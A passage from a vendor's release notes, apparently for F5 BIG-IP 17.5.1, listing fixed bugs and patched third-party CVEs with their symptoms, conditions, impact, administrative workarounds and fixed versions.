Conditions:
A high number of signatures across multiple or duplicated inspection profiles leads to significant delays in enforcement after a reboot.

Impact:
Traffic is not inspected for the signature after reboot before enforcing and actually passes through.

Fix:
After the fix, IPS Profiles will take less time to reach the ready state, even if the tmm or mcpd is restarted.

Fixed Versions:
17.5.1.1

1756525-2 : ixlv driver could have failed hardware offload with TSO off

Links to More Info: BT1756525

Component: Local Traffic Manager

Symptoms:
IPv4 packets for TLS alerts contain empty IP checksums.

Conditions:
-- The ixlv driver is used by tmm
-- TSO is disabled

Impact:
Empty checksums will cause TLS clients to reject TLS alert messages.

Workaround:
Change driver type to use xnet in tmm_init.tcl by inputting `device driver pci vendor_dev 8086:1889 xnet` or for a specific PCI device with `device driver pci XX:XX.X xnet`

Fix:
Removed offloading IPv4 header checksum to the hardware unless TSO is on and so use what BIG-IP calculates instead.

Fixed Versions:
17.5.1

1756397-3 : BIG-IP is not forwarding the Extended DNS Error (EDE) Codes to Clients

Links to More Info: BT1756397

Component: Global Traffic Manager (DNS)

Symptoms:
When BIG-IP processes responses from upstream name servers, it strips the Extended DNS Error (EDE) information, which provides additional details about the cause of DNS errors.

Conditions:
-- BIG-IP is configured with a listener that has a DNS profile to process DNS queries.
-- DNS requests from clients include the EDNS (Extension Mechanisms for DNS) flag.

Impact:
DNS clients will not receive additional information about the cause of DNS errors.

Workaround:
None

Fix:
With the fix, BIG-IP is now able to process and respond to clients with Extended DNS Errors (EDE) information that it receives from upstream name servers.

We have exposed the fix through a Db variable called dns.forwardextendeddnserrorcode. By default, the Extended DNS Errors(EDE) support is disabled. If you want to enable EDE support you can change the Db variable value to enable.
sys db dns.forwardextendeddnserrorcode {
    value "enable"
}
To avoid truncation due to lengthy extra text that is part of the EDE, we have limited it to 64 bytes.

Fixed Versions:
17.5.1

1753933-4 : CVE-2020-14393 perl-dbi: Buffer overflow on an overlong DBD class name

Component: TMOS

Symptoms:
A buffer overflow was found in perl-DBI < 1.643 in DBI.xs. A local attacker who is able to supply a string longer than 300 characters could cause an out-of-bounds write, affecting the availability of the service or integrity of data.

Conditions:
Triggered when loading a DBD module with an excessively long class name.

Impact:
This vulnerability may cause a heap-based buffer overflow, potentially leading to a crash or arbitrary code execution.

Workaround:
NA

Fix:
Patched Perl-DBI to fix the vulnerability.

Fixed Versions:
17.5.1

1753617-5 : CVE-2023-24621 Untrusted Polymorphic Deserialization to Java Classes

Component: TMOS

Symptoms:
It allows untrusted deserialisation to Java classes by default, where the data and class are controlled by the author of the YAML document being processed.

Conditions:
yamlbeans versions before 1.15 are vulnerable

Impact:
It can result in remote code execution (RCE) or denial of service.

Workaround:
N/A

Fix:
yamlbeans has been patched to address this vulnerability.

Fixed Versions:
17.5.1.1

1737465-3 : Port number being used for verifying server certificate CN field

Links to More Info: BT1737465

Component: Access Policy Manager

Symptoms:
TMM reports a SSL certificate error:

warning tmm1[18695]: 01260022:4: Peer cert verification: The common name (10.1.1.1) is invalid or does not match the authenticate name (10.1.1.1:4430). The subject alternative name also does not match the authenticate name.

Conditions:
-- The ssl server certificate is set to "require"
-- The URI includes the port number

Impact:
SSL server certificate validation fails

Workaround:
Set server certificate requirement to "ignore"

Fixed Versions:
17.5.1

1709557-2 : Header value length greater than 1023 in alternate response file headers causing ASM restart loop

Links to More Info: BT1709557

Component: Application Security Manager

Symptoms:
Bd goes into a restart loop with the following error messages:

ECARD_POLICY|NOTICE|Oct 25 02:01:27.939|21735|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ACCOUNT_ALTERNATE_RESPONSE_FILE_HEADERS res:[0]
BD_MISC|ERR |Oct 25 02:01:27.939|21735|temp_func.c:2295|CONFIG_TYPE_PROTOBUF_FILENAMES message had parsing error: could not parse protobuf message
BD_MISC|ERR |Oct 25 02:01:27.939|21735|table_funcs.cpp:2734|CONFIG_TYPE_PROTOBUF_FILENAMES message had errors in block_index: 22. status=-1
BD_MISC|NOTICE|Oct 25 02:01:27.939|21735|table_funcs.cpp:2734|{"component":"BD","datetime":"1969-12-31T16:00:00Z","jobId":"","jobStartDatetime":"1969-12-31T16:00:00Z","jobStatus":"failed"}
BD_MISC|ERR |Oct 25 02:01:27.940|21735|temp_func.c:2288|CONFIG_TYPE_MANIFEST message had parsing error: could not parse protobuf message

Conditions:
A header in the blocking page is configured to be more than 1023 bytes.

Impact:
Endless restart loop

Workaround:
Change the blocking page header size.

Fixed Versions:
17.5.1

1708189-3 : ICMP errors with HSL can rarely cause tmm cores

Links to More Info: BT1708189

Component: Local Traffic Manager

Symptoms:
High-speed logging configured to use a remote syslog server can cause tmm to core if the server sends back ICMP errors (like ICMP unreachable).

Conditions:
-- High Speed Logging to a remote syslog server
-- Remote server sends back ICMP errors

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.1

1701209-2 : APM ignores the update-interval setting

Links to More Info: BT1701209

Component: Access Policy Manager

Symptoms:
Irrespective of update-interval value, APM fetches the CRL from the CRLDP for each client certificate.

Conditions:
Configure update-interval.

Impact:
Multiple request keep triggering to update the CRL cache.

Workaround:
None

Fixed Versions:
17.5.1.1

1697273-4 : CVE-2020-8037 tcpdump: ppp decapsulator can be convinced to allocate a large amount of memory

Links to More Info: K000149929

1697041-2 : TMM may fail to start, device is inoperative★

Links to More Info: BT1697041

Component: Local Traffic Manager

Symptoms:
In very rare circumstances, tmm may fail to start and log a message similar to the following:

/var/log/tmm:
notice vmxnet3(1.3)[1b:00.0]: Waiting for tmm1 to reach state 1...

/var/log/tmm1:
notice Failed to connect to TMROUTED: ERR_INPROGRESS. Try again in 10 seconds.

notice MCP connection expired early in startup; retrying

While the issue is occurring, there will be incomplete ARP entries for tmm.

# arp -an | grep 127.1.1.
? (127.1.1.2) at <incomplete> on tmm
? (127.1.1.3) at <incomplete> on tmm
? (127.1.1.4) at <incomplete> on tmm
? (127.1.1.6) at <incomplete> on tmm
? (127.1.1.7) at <incomplete> on tmm
? (127.1.1.8) at <incomplete> on tmm

Conditions:
-- BIG-IP VE
-- Hypervisor under high load

This has also been reported to occur after the reboot during an upgrade.

Impact:
Tmm is unable to start

Workaround:
Restart tmm manually with

bigstart restart tmm

Alternatively, set up a static arp mapping on the linux host:

arp -s 127.1.1.2 00:01:23:45:67:01
arp -s 127.1.1.3 00:01:23:45:67:02
arp -s 127.1.1.4 00:01:23:45:67:03
arp -s 127.1.1.5 00:01:23:45:67:04
arp -s 127.1.1.6 00:01:23:45:67:05
arp -s 127.1.1.7 00:01:23:45:67:06
arp -s 127.1.1.8 00:01:23:45:67:07

If there are more than 8 tmms, the following script can be used:

for y in $(seq $(/usr/bin/getdb Provision.tmmCountActual)); do arp -s 127.1.1.$(($y+1)) 00:01:23:45:67:$(printf "%02g" $y); done

Fix:
Fixed a race condition during tmm startup.

Fixed Versions:
17.5.1.1

1692917-5 : CVE-2024-6232 CPython Tarfile vulnerability

Links to More Info: K000148252, BT1692917

1678809-5 : CVE-2023-26117: Angular JS vulnerability

Links to More Info: K000150967

1678805-5 : CVE-2023-26118 angularjs: Regular Expression Denial of Service via the <input type="url"> element

Links to More Info: K000150967

1678793-5 : CVE-2019-14863 angular: Cross-site Scripting (XSS) due to no proper sanitization of xlink:href attributes

Links to More Info: K000141459

1678789-5 : CVE-2019-10768 AngularJS: Prototype pollution in merge function could result in code injection

Links to More Info: K000141463

1678777-5 : CVE-2022-25869 angular.js : insecure page caching in the browser, which allows interpolation of <textarea> elements.

Links to More Info: K000141459

1678769-5 : CVE-2023-26116 angularjs: Regular Expression Denial of Service via angular.copy()

Links to More Info: K000141463

1673161-4 : CVE-2023-45853 zlib: integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_6

Links to More Info: K000149884, BT1673161

1672997-3 : Apmd memory grows over time in AD/LDAP auth scenarios

Links to More Info: BT1672997

Component: Access Policy Manager

Symptoms:
Apmd memory grows over time. It is mainly due to memory fragmentation due to memory sharing among apmd threads.

Conditions:
The access policy in use has AD/LDAP auth as one of the agents

Impact:
Apmd memory grows over time. After it grows beyond a limit, oom killer might kill apmd thereby leading to traffic disruption.

Workaround:
None

Fixed Versions:
17.5.1, 16.1.6

1672313-5 : CVE-2016-9841 zlib: Out-of-bounds pointer arithmetic in inffast.c

Links to More Info: K000149915, BT1672313

1672249-5 : CVE-2016-9840 zlib: Out-of-bounds pointer arithmetic in inftrees.c

Links to More Info: K000149905, BT1672249

1636077-2 : Adding an operationally DOWN interface to existing LAG causes traffic disruption on r2k/r4k

Links to More Info: BT1636077

Component: Local Traffic Manager

Symptoms:
When an operationally DOWN interface is added to an existing LAG interface, traffic flow to the tenant stops on r2k/r4k based appliances.

Conditions:
-- Interface is marked down
-- Interface is added to an existing LAG interface

Impact:
Traffic flow gets impacted and the system misses the packets routed onto the LACP trunk to where the LAG member was added.

Workaround:
Restart tmm on all tenants that are associated with the trunk.

Fixed Versions:
17.5.1

1635209-3 : Firewall NAT policy with SNAT automap does not work with ALG protocols in active mode

Links to More Info: BT1635209

Component: Advanced Firewall Manager

Symptoms:
Connection is dropping when firewall NAT policy uses SNAT automap and ALG.

Conditions:
-- Firewall NAT translation using source automap.
-- ALG protocol profile applied.

Impact:
-- Connection is dropped

Workaround:
None

Fix:
Done

Fixed Versions:
17.5.1.1

1629701-2 : Attack signature is not shown in local event log for staged entity when not in learn/staging

Links to More Info: BT1629701

Component: Application Security Manager

Symptoms:
Attack signature is not shown in local event log for staged entity when the attack signatures are not in learning/staging.

Conditions:
- Security policy with staged URL, parameter or cookie;
- Attack signatures are not in learning or staging;
- Attack is detected by signature in request.

Impact:
Detected attack signature is not shown in local event log.

Workaround:
Possible workarounds:
- enable learning for attack signatures;
- examine detected signatures via remote log (if enabled).

Fix:
Detected attack signatures are now shown also for staged entities.

Fixed Versions:
17.5.1

1628001-4 : TMM core when ACL operation is performed on a deleted session

Links to More Info: BT1628001

Component: Access Policy Manager

Symptoms:
TMM core

Conditions:
A session was deleted while performing an ACL iRule action.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
The TMM crash caused when performing iRule command
"[ACCESS::acl matched]" for a deleted session, this can be mitigated by adding a check for session existence like below

==================
set sessionid [ACCESS::session data get {session.user.sessionid}]

if {[ACCESS::session exists -sid $sessionid]} {
    if {[ACCESS::acl matched] eq <ACL NAME>}
    {
    ///Logic
    }
  } else {
        log local0. "Session does not exist"
  }
=============

Fixed Versions:
17.5.1

1626337-4 : RPMS not being included in the generated UCS with fix of ID985329 incorporated★

Links to More Info: K81310610, BT1626337

Component: Device Management

Symptoms:
While saving the UCS file after installing iAppLX RPMs, iAppLX RPMs are not included in the UCS file. The issue is observed in BIG-IP running software release that includes fix of ID985329.

Some possible symptoms:
-- AS3 replies with a "404 not found" error after upgrading
-- iAppLX applications that have a GUI, such as SSL Orchestrator, display a "Not Found" or "Access forbidden" error after upggrading

Conditions:
- Saving UCS using either CLI (Command Line Interface) or GUI
- BIG-IP running software release that includes fix of ID985329 (starting with verison 16.1.5, 17.1.2, 17.5.0)

Impact:
iAppLX RPMs and iAppLX declarations will be missing if UCS restore is performed. This can cause issues such as "NotFound" or "Access Forbidden" when trying to access the iAppLX.

This can be encountered following an upgrade from verison 16.1.5, 17.1.2, 17.5.0 to a later version.

Workaround:
Mitigation depends on the iAppLX package you are using because uninstall/reinstall approach is sometimes different.

SSL Orchestrator
Follow the recovery steps in K81310610: SSL Orchestrator Configuration: Access forbidden or Not Found or show wizard of new topology
https://my.f5.com/manage/s/article/K81310610

Access Guided Configuration
Follow the recovery steps in K55177400: Guided configuration displays: Not found - The requested URL was not found on this server
https://my.f5.com/manage/s/article/K55177400.

AS3 or any other manually-installed iAppLX
Follow the recovery steps in K000132348: AS3 declaration failure: mgmt shared service-discovery task update response=404 body
https://my.f5.com/manage/s/article/K000132348

Impact of workaround: uninstalling and reinstalling an iAppLX RPM should not impact the configuration data that the iAppLX was managing; for example uninstalling and reinstalling AS3 will not cause the previously-loaded AS3 declaration to be lost.

Fix:
If you upgrade from affected version to unaffected, you will still have to complete the workaround as described in K81310610 article.

Fixed Versions:
17.5.1

1623941-4 : [AD] BIG-IP APM AD Auth agent sometimes prompts for new password (every login) after upgrade★

Links to More Info: BT1623941

Component: Access Policy Manager

Symptoms:
AD Auth agent always prompts for a new password after upgrading from v15.x to v17.1.x The user password is *NOT* expired in Active Directory. The user account does not have the "User must change password at next logon" option checked.
This can be seen any in any version upgrades.

Conditions:
Active Directory auth is configured

Impact:
After the upgrade to v17.1.x, v16.1.x, v15.1.x change password prompt appears every time you log in.

Workaround:
None

Fix:
Added the Client constructer as a part of the Client Initialisation

Fixed Versions:
17.5.1, 16.1.6

1623597-3 : Nat46/64 hardware connection re-offload is not optimal.

Links to More Info: BT1623597

Component: TMOS

Symptoms:
Nat46/64 hardware connection re-offload is not optimal.

Conditions:
Nat46/64 configuration with hardware offload (fastl4).

Impact:
Not optimal resource usage.

Workaround:
None

Fixed Versions:
17.5.1

1623197-5 : CVE-2024-37891 urllib3: proxy-authorization request header is not stripped during cross-origin redirects

Links to More Info: K000140711, BT1623197

1622789-3 : Traffic levels for NAT64/46 traffic might be different after an upgrade

Links to More Info: BT1622789

Component: TMOS

Symptoms:
Starting from version 16.X BIG-IP supports hardware acceleration of NAT64/46 traffic. Due to a software defect part of accelerated traffic might not be reported properly in connection statistics.

Conditions:
Nat64/46 virtual server with fastL4 PVA acceleration enabled.

Impact:
Part of accelerated traffic might not be reported properly in connection statistics.

Workaround:
None

Fixed Versions:
17.5.1, 17.1.2

1622425-2 : Float the management ip to the next available ip when the connectivity of primary blade is lost

Links to More Info: BT1622425

Component: Local Traffic Manager

Symptoms:
When the connectivity of the primary blade is lost with the management interface, then the UI is also lost.

Conditions:
The primary blade lost connectivity on the management interface.

Impact:
Lost chassis monitoring/alerting and access to the Management GUI.

Workaround:
Manual switchover of the slot will solve the issue.

Fix:
Float the management ip to the next available ip when the primary blade loses connectivity on the management interface without disturbing the data plane.

Fixed Versions:
17.5.1.1

1621269-1 : TMM restart loop when attaching large number of interfaces.

Links to More Info: BT1621269

Component: TMOS

Symptoms:
TMM is unable to finish initialization when attaching 9 or more Intel 710/E810 SR-IOV interfaces.

Conditions:
-- Using 9 or more Intel 710/E810 SR-IOV VFs

Impact:
BIG-IP is unable to go into the Active state because TMM restart loop is present.

Workaround:
Update Mcpd.KeepAliveCount DB variable to 127 and reboot the BIG-IP.

Fix:
DB variable Mcpd.KeepAliveCount was introduced to keep network connections between TMOS proccesses alive longer. Therefore, TMM would have enough time to finish initializing when attaching 9 or more Intel 710/E810 SR-IOV interfaces.

Fixed Versions:
17.5.1

1621185-2 : A BD crash on a specific scenario, even after ID1553989

Links to More Info: BT1621185

Component: Application Security Manager

Symptoms:
A BD crash, failover.

Conditions:
Specific requests under specific conditions.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
Fixed a bd crash while passing traffic.

Fixed Versions:
17.5.1

1620785-4 : F5 cache mechanism relies only on Last-Modified/If-Modified-Since headers and ignores the etag/If-None-Match headers

Links to More Info: BT1620785

Component: Local Traffic Manager

Symptoms:
-- Server has a document x with etag - AAAA
-- When the client requests for x through BIG-IP, BIG-IP caches it and responds with 200 OK.
-- Document on Server changes; new etag is BBBB and cache in BIG-IP is expired
-- Clients sending requests with If None-Match: BBBB, should receive 304 with BBBB response but receiving 200 OK with AAAA.

Conditions:
-- Client having access to the server directly and through BIG-IP with cache enabled.
(Or)
-- Deployment containing two BIG-IPs with caching enabled one at a time.

Impact:
BIG-IP serves old documents when requested with etag of the latest document

Workaround:
When HTTP_REQUEST_RELEASE {

 if { [HTTP::header exists If-None-Match] && [HTTP::header exists ETag] }{

   HTTP::header remove If-None-Match

 }

}

Fixed Versions:
17.5.1

1617037-4 : [PA]"navigator.userAgent" detects Chrome browser as Safari

Links to More Info: BT1617037

Component: Access Policy Manager

Symptoms:
You may observe an error like below in Developer tools console
Uncaught TypeError: TypeError: Cannot read properties of undefined (reading 'document')

Conditions:
Accessing applications through Portal Access

Impact:
Unable to access applications via Portal Access.

Workaround:
None

Fixed Versions:
17.5.1.1

1612885-3 : [PORTAL] Handle error in get_frameElement()

Links to More Info: BT1612885

Component: Access Policy Manager

Symptoms:
You may see get_frameElement() related errors in Devtools Console:
cache-fm-Modern.js:1494 Uncaught TypeError: Cannot read properties of undefined (reading 'document')

Conditions:
Portal Access configured on APM

Impact:
Failure in loading application through Portal Access.

Workaround:
None

Fixed Versions:
17.5.1, 17.1.2

1600561-5 : CVE-2024-2961 glibc Vulnerability

Links to More Info: K000140901

1596097-5 : CVE-2023-37369 qtbase: buffer overflow in QXmlStreamReader

Links to More Info: K000148809

1596073-5 : CVE-2023-38197 qtbase: infinite loops in QXmlStreamReader

Links to More Info: K000148809

1592209-3 : Monitored objects stays "Offline (Enabled)" even after manually enabling the server object after reboot

Links to More Info: BT1592209

Component: Global Traffic Manager (DNS)

Symptoms:
A Generic host server object reports “Offline (Enabled)”.

When enabling the server object, the bellow message is logged to /var/log/gtm:

gtmd[xxxx]: 011a5004:1: SNMP_TRAP: Server /Common/[generic-server] (ip=192.1.1.51) state change blue --> red (No enabled virtual server available)

Conditions:
-- Any operations that cause GTMd to rebuild its probe list. Following are a few example operations:
- Monitored objects being disabled,
- GTMd restart,
- Loss of iQuery to other GTMs,
- Adding or removing probes.

-- BIG-IP is running on a software versions 17.1.1 or 16.1.5 or later versions in which the ID 1133201 is fixed.

Impact:
Virtual servers that are associated with the affected generic server object may stay unavailable. Hence, pool or wideIP, which uses the affected server object, may be unavailable too.

Workaround:
After the issue, restart the GTMd. Generic host server object will be get back to 'Available (Enabled)' status.

Following is an example command to restart the GTMd:
# tmsh restart /sys service gtmd

Global server load balancing is disrupted while gtmd is restarted.

Fixed Versions:
17.5.1.1

1591813-12 : [APM][SAML] SP automation fails with error message 'cannot update (cert_type)'

Links to More Info: BT1591813

Component: Access Policy Manager

Symptoms:
Whenever a certificate is updated while fetching the metadata from the metadata URL in SAML automation for creating SP connector, an error occurs:

err mcpd[8894]: 01070712:3: Caught configuration exception (0), file:(/Common/sp_cert.crt) cannot update (cert_type).

Conditions:
- Configure BIG-IP as IDP with SP automation objects (metadata URL as internal virtual server URL)
- Configure a internal virtual server and attach an iRule to get the iFile based on the URI.
   (https://1.1.1.1/PS0028JP)
-. Update the iFiles that returns metadata and wait till the SP-automation to update its sp-connector objects
 PS0028JP -> ifile that returns metadata of SP with different cert ( self signed to CA and viceversa)

Impact:
Connector automation fails to create SP Connectors with new certificates.

Workaround:
None

Fixed Versions:
17.5.1

1591481-4 : CVE-2017-1000381: C-ares Vulnerability iRulesLX

Links to More Info: K000149130

1591249-5 : CVE-2018-6913 perl: heap buffer overflow in pp_pack.c

Links to More Info: K000141301, BT1591249

1589661-5 : CVE-2019-3860 libssh2: Out-of-bounds reads with specially crafted SFTP packets

Links to More Info: K000149288, BT1589661

1589645-5 : CVE-2019-3859 libssh2: Unchecked use of _libssh2_packet_require and _libssh2_packet_requirev resulting in out-of-bounds read

Links to More Info: K000149288

1587453-2 : “default-all” profile is selected by default in “Dynamic LAN address spaces”

Links to More Info: BT1587453

Component: Access Policy Manager

Symptoms:
“default-all” profile is selected by default in “Dynamic LAN address spaces” when a new Network Access Connection is created

Conditions:
Create a new Network access resource

Impact:
Split tunnel will be ignored and the connection will be full tunnel due “default-all” profile being selected by default in “Dynamic LAN address spaces”

Workaround:
Remove "default-all" from “Dynamic LAN address spaces”

Fix:
"default-all" is no longer selected by default in “Dynamic LAN address spaces”

Fixed Versions:
17.5.1.1

1587421-2 : GUI issue when creating a new Network Access connection

Links to More Info: BT1587421

Component: Access Policy Manager

Symptoms:
In Basic view, selecting Split Tunnel does not show the LAN Address Space field.

The configuration is saved with default-all and creates a full tunnel.

Moving default-all to Available triggers an error:

LAN Address Space cannot be empty

Conditions:
Creating a new Network Access connection in Basic view with Split Tunnel enabled.

Impact:
Cannot configure Split Tunnel in Basic view.

Leads to full tunnel unless configured via the Advanced view.

Workaround:
Use Advanced view and set IPv4 LAN Address Space manually

Fix:
'IPv4 LAN address space' option is now available in 'Basic' view when split tunnel checkbox is selected

Fixed Versions:
17.5.1.1

1586537-3 : CVE-2024-0985 postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL

Links to More Info: K000140188

1585277-4 : Libexpat through 2.6.1 allows an XML Entity Expansion attack: CVE-2024-28757

Links to More Info: K000139637, BT1585277

1583745-3 : "Out of bounds" TCL error in VDI iRule

Links to More Info: BT1583745

Component: Access Policy Manager

Symptoms:
You may observe below error logs in /var/log/ltm

“Out of bounds” TCL error

Conditions:
Citrix VDI with an Integration mode.

Impact:
Unable to process VDI traffic.

Workaround:
None

Fixed Versions:
17.5.1.1

1583261-3 : Saml traffic can rarely cause tmm cores

Links to More Info: BT1583261

Component: Access Policy Manager

Symptoms:
Tmm seg faults in saml_sp_crypto_ctx_init.

Conditions:
This was seen when there was a permissions error loading the service provider key.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1

1582781-6 : CVE-2021-23177 libarchive: extracting a symlink with ACLs modifies ACLs of target

Links to More Info: K000140961, BT1582781

1580357-2 : CVE-2016-2037 CVE-2015-1197 cpio: out of bounds write

Component: TMOS

Symptoms:
The cpio_safer_name_suffix function in util.c in cpio 2.11 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted cpio file.

Conditions:
Extraction of a crafted archive using the cpio utility.

Impact:
The Vulnerability may lead to out-of-bounds write, potentially causing a crash or arbitrary code execution.

Workaround:
NA

Fix:
Patched cpio to fix the vulnerability.

Fixed Versions:
17.5.1

1579533-3 : Jitterentropy read is restricted to FIPS mode or TMM usage only, for performance reasons★

Links to More Info: BT1579533

Component: Local Traffic Manager

Symptoms:
If jitterentropy-read from CPU jitter is used in all cases, a big performance problem is seen for most cases where BIG-IP works in non-FIPS mode. This can be encountered after upgrading to version 17.x from an earlier BIG-IP version.

Conditions:
The issues occur when BIG-IP operates in non-FIPS or FIPS mode and use jitterentropy to generate seed.

Impact:
Very high CPU utilization is seen when BIG-IP handles traffic while in non-FIPS mode.

Workaround:
None

Fix:
Jitterentropy-read of CPU jitter is now invoked in any one of these situations,
- Either BIG-IP operates in FIPS mode,
- TMM is processing traffic in non-FIPS and FIPS modes. In this case, none of the other components perform the stated jitter read operations and improves performance.

Fixed Versions:
17.5.1

1576897-4 : CVECVE-2016-9063 firefox: Possible integer overflow to fix inside XML_Parse in Expat

Links to More Info: K000139691, BT1576897

1576125-4 : Node.js vulnerability CVE-2024-27983

Links to More Info: K000139532, BT1576125

1572145-5 : CVE-2023-29469 libxml2: Hashing of empty dict strings isn't deterministic

Links to More Info: K000139592, BT1572145

1567761-3 : [APM] AccessProfile name is missing in log User '<username>' belongs to domain '<domain_name>'

Links to More Info: BT1567761

Component: Access Policy Manager

Symptoms:
When a user logs in using the VPN using an alternate alias for the domain name, a log message is logged to the apm debug logs. But it does not include the access profile name in the log:

debug apmd[13866]: 0149017b:7: ::c9b6820d: AD module: User 'testuser@mysite.com' belongs to domain 'mysite.net'

Conditions:
User logged in using AD Auth with alternate alias for domain name.

Impact:
The debug log message is ambiguous.

Workaround:
None

Fixed Versions:
17.5.1

1566997-5 : CVE-2016-10349 libarchive: Heap-based buffer over-read in the archive_le32dec function

Links to More Info: K000148259

1566533-7 : CVE-2017-18342 PyYAML: yaml.load() API could execute arbitrary code

Links to More Info: K000139901, BT1566533

1555525-4 : WCCP traffic may have its source port changed

Links to More Info: BT1555525

Component: Local Traffic Manager

Symptoms:
WCCP traffic may have its source port changed as it leaves the Linux host. This could cause WCCP sessions to not be established.

Conditions:
-- WCCP configured
-- BIG-IP Virtual Edition platform or r2000 or r4000 tenants.

Impact:
WCCP messages may not be successfully processed by the peer because the source port is not 2048.

Workaround:
Cat >> /config/tmm_init.tcl << EOF

proxy BIGSELF {
   listen 0.0.0.0%＼${rtdom_any} 2048 netmask 0.0.0.0 {
     proto ＼$ipproto(udp)
     srcport strict
     idle_timeout 30
     transparent
     no_translate
     no_arp
     l2forward
     tap enable all
     protect
   }
   profile _bigself
 }
EOF

bigstart restart tmm

Fixed Versions:
17.5.1, 17.1.2, 16.1.6

1553169-4 : Parsing tcp payload using iRules can be inaccurate because of binary to string conversion

Links to More Info: BT1553169

Component: Local Traffic Manager

Symptoms:
When an iRule is used to parse tcp payload, the value returned as string can be inaccurate.

Conditions:
TCP payload is parsed using iRule.

Impact:
The iRule functionality may not work as expected, as the parsed data can be inaccurate.

Workaround:
None

Fix:
None

Fixed Versions:
17.5.1.1

1552705-6 : New subsession reads access_token from per-session policy instead of per-request policy.

Links to More Info: BT1552705

Component: Access Policy Manager

Symptoms:
When BIG-IP is configured with OAuth Agents both in per-session policy and per-request policy, OAuth Flow fails to execute successfully.

Conditions:
When new subsessions are created TMM fails to read the access token from subsession variables. Therefore, gets the old token from the main session, i.e. per-session policy.

Impact:
BIG-IP Administrator will not be able to configure BIG-IP as OAuth Client & RS with both per-session policy and per-request policy.

Workaround:
Use OAuth Agents only in the per-request policy, configure per-session policy with just empty allow.

Fixed Versions:
17.5.1, 16.1.6

1550869-4 : Tmm leak on request-logging or response logging on FTP virtual server

Links to More Info: BT1550869

Component: Local Traffic Manager

Symptoms:
Tmm memory leak is observed.

Conditions:
Either of these conditions:

-- An LTM profile with request-logging enabled
-- response-logging enabled on a virtual server supporting FTP

Impact:
A tmm memory leak occurs.

Workaround:
Disable request/response logging on the FTP virtual server.

Fixed Versions:
17.5.1

1550785-4 : HSB lock up in Syn-Ack generator module

Component: TMOS

Symptoms:
Datapath flow control in HSB RX and TX directions. Datapath lockup detected by BIG-IP.

Conditions:
Syn Cookie feature is enabled.

Impact:
Datapath lockup. Requires reboot.

Workaround:
This has been fixed in all iSeries platforms for BIG-IP versions 15.1.x, 16.1.x, 17.1.x, 15.5.x.

Fixed in these bitfiles and all bitfiles newer than these.

v15.1.x:

ID1757053: HSB v2.10.8.0 bitstream release for VIPRION B2250 blades
ID1759517: HSB v3.8.98.0 bitstream release for VIPRION B44x0 blades
ID1593933: HSB v5.6.10.0 bitstream release for i5000 / i7000 / i10000-series appliances
ID1593929: HSB v5.23.10.0 bitstream release for i11000-series appliances

v16.1.x:

ID1554997: HSB v2.12.6.0 bitsteam release for VIPRION B2250 blades
ID1564281: HSB v3.10.5.0 bitstream release for VIPRION B44x0 blades
ID1572961: HSB v5.8.5.0 bitstream release for i5000 / i7000 / i10000-series appliances
ID1574653: HSB v5.25.4.0 bitstream release for i11000-series appliances

v17.1.x / v17.5.x:

ID1587357: HSB v2.13.5.0 bitsteam release for VIPRION B2250 blades
ID1582633: HSB v3.11.6.0 bitstream release for VIPRION B44x0 blades
ID1587341: HSB v5.9.9.0 bitstream release to AFM for i5000 / i7000 / i10000-series appliances
ID1587349: HSB v5.26.5.0 bitstream release for i11000-series appliances

Fix:
Bug was found and fixed in the Syn-Ack generator module in the FPGA.

First bitfiles with the fix are listed in the Mitigation / Workaround section.

Fixed Versions:
17.5.1, 17.1.0

1519001-4 : After a crash, tmm may experience memory corruption

Links to More Info: BT1519001

Component: Local Traffic Manager

Symptoms:
On an F5OS tenant on affected platforms, if tmm does not stop gracefully - meaning it crashed or was killed, it may experience memory corruption when it starts again, leading to another crash.

Conditions:
-- F5OS tenant on a VELOS system or an r5000, r10000, or r12000-series appliance.
-- Tmm does not shut down gracefully

r4000 and r2000 series appliances are not affected.

Impact:
Tmm may crash again when it starts up. Traffic disrupted while tmm restarts.

Workaround:
Reboot the tenant, or if tmm is able to start, shut down tmm gracefully and restart.

Fix:
The data mover no longer corrupts memory when tmm is starting after a crash.

Fixed Versions:
17.5.1.1

1517561-5 : CVE-2023-28484 libxml2: NULL dereference in xmlSchemaFixupComplexType

Links to More Info: K000139641, BT1517561

1505649-3 : SSL Handshake fall back to full handshake during session resumption, if SNI string is more than 32 characters in length

Links to More Info: BT1505649

Component: Local Traffic Manager

Symptoms:
When the SNI string is longer than 32 characters, the SSL handshake switches to the full handshake when session resumption is attempted.

Conditions:
- SSL resumption should be enabled in the client's SSL profile of their BIG-IP.
- SNI string should be more than 32 characters in length of the SSL client Hello packet received from the user.

Impact:
SSL resumption would fail if the SNI string is more than 32 characters in length.

Workaround:
using strings lesser than 32 characters for SNI

Fixed Versions:
17.5.1, 17.1.2

1505301-2 : CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

Component: TMOS

Symptoms:
A flaw was found in rsync that is triggered by a victim rsync user/client connecting to a malicious rsync server. The server can copy and overwrite arbitrary files in the client's rsync target directory and subdirectories. This flaw allows a malicious server, or in some cases, another attacker who performs a man-in-the-middle attack, to potentially overwrite sensitive files on the client machine, resulting in further exploitation.

Conditions:
NA

Impact:
This flaw allows a malicious server, or in some cases, another attacker who performs a man-in-the-middle attack, to potentially overwrite sensitive files on the client machine, resulting in further exploitation.

Workaround:
NA

Fix:
Patched rsync to fix this vulnerability

Fixed Versions:
17.5.1.1

1495381-3 : TMM core with SWG explicit forward proxy configuration

Links to More Info: BT1495381

Component: Access Policy Manager

Symptoms:
TMM core.

Conditions:
SWG explicit forward proxy with NTLM or Kerberos credentials identification method.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1

1494229-5 : CVE-2023-2953 openldap: null pointer dereference in ber_memalloc_x function

Links to More Info: K000138814, BT1494229

1492337-4 : TMM fails to start up using Xnet-DPDK-virtio due to out of bounds MTU

Links to More Info: BT1492337

Component: TMOS

Symptoms:
TMM goes into a restart loop and fails to start with an error message that the MTU is out of bounds

Log message:
   notice virtio_mtu_set(): MTU should be between 68 and 1500

Conditions:
- Using Xnet-DPDK-virtio driver
